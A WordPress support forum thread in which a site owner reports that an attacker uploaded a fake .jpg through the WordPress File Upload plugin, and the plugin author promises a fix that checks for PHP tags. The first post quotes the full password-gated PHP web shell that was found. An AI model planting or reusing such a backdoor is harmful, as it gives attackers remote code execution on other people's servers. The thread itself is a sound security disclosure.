Potentially serious security issue

  • planetree

    (@planetree)


    5 years ago

    Someone was able to use the WordPress File Upload plugin to upload a file to our site with the filename “wfu_widget_logo.jpg”. The file was not a .jpg as named, it contained the following PHP code:

    “<?php extract($_REQUEST);if(md5($b)!=’9546d40688a5eaae1de839b1d3566e1a’){die();}$c($f, $a);include_once $f; ?>”

    For unfathomable reasons, WordPress File Upload deposits any guest uploads into it’s own root folder (/wp-content/plugins/wp-file-upload/lib) and regardless of the file name if there’s PHP code there then at the very least it will cause an error that takes your site down if there’s a code error, which is what happened to us. Worst case that code will be executed, as clearly that attacker intended in this case.

    If this is even a remote possibility under some basic wordpress configuration I would think it would warrant a giant warning when you install the plugin at the very least. Ideally there would be something to prevent this.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Author nickboss

    (@nickboss)

    Hi, was the file uploaded finally?

    Please note that the plugin takes security very seriously. It implements several ways to protect from hackers. For cases like yours, here are some measures that it takes:

    1. Allows only certain extensions, which can be further limited. In your case, .jpg is a common one, so it passed this step.
    2. It checks for double extensions (like php.jpg). Not your case.
    3. It checks the contents of the file to verify the extension. For this, it uses the default WordPress functions. So, I am surprised that the image managed to pass this step.

    Are you sure that the file was uploaded using he plugin? Has the upload been recorded in View Log in plugin’s Dashboard area?

    Regards

    Nickolas

    Thread Starter planetree

    (@planetree)

    The file was definitely uploaded through the plugin, it’s in the log.

    Whatever function you’re using to verify the extension is obviously unsuitable. If you’re operating in a PHP environment then you’d think that checking a file for the string “<?php” if it’s anything other than a .php extension file would be the bare minimum! As an FYI, I did try uploading the file on the section of our site where we write the code, where we use the Codeigniter framework, and it correctly rejected the file, so if you’re looking for code that does the job right you need look no further than that.

    Let’s be clear, there is at least one malicious actor out there that is actively searching for instances of your plug-in and uploading malicious code. In the face of that it is absolutely irrelevant if WordPress is to blame and the fact that you “use the default WordPress functions” absolves you of no blame now that you know it’s an issue. Like I said, at a minimum you should write some code to reject any file with “<?php” in it, that would take you 2 minutes to do and it’s almost malpractice not to have already done so.

    If you provide the URL of your WordPress site with your plugin installed I’m happy to demo crashing it by uploading the file I described. Just let me know a good time so you can delete the file and bring it back up again quickly.

    • This reply was modified 5 years ago by planetree.
    Plugin Author nickboss

    (@nickboss)

    Hi again.

    I very well understand what you say. My previous email was not to doubt your statement. Take it easy! I am just trying to understand why it happened.

    As I said, it seems that the file passed bullet No3, which was exactly doing what you mention, checking of file contents. It happens the same in my environment. So I need to understand why.

    I will get back to you ASAP.

    Thanks for the notice.

    Nickolas

    Plugin Author nickboss

    (@nickboss)

    I will release a new version of the plugin today with a fix that checks file contents for PHP tags without relying on WordPress functions. I checked it and it works for cases like the one you mentioned.

    I also checked how Codeigniter handles file uploads. It makes extensive checks on file contents to avoid xss attacks. I will consider adding it as an additional security layer in the next release (not the one coming today but the following one).

    Btw, are you a security expert?

    Regards

    Nickolas

    Thread Starter planetree

    (@planetree)

    Thanks Nick. No security background, just write our own code for our applications.

    Plugin Author nickboss

    (@nickboss)

    Ok if you notice any other problems just let me know.

    Regards

    Nickolas

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Potentially serious security issue’ is closed to new replies.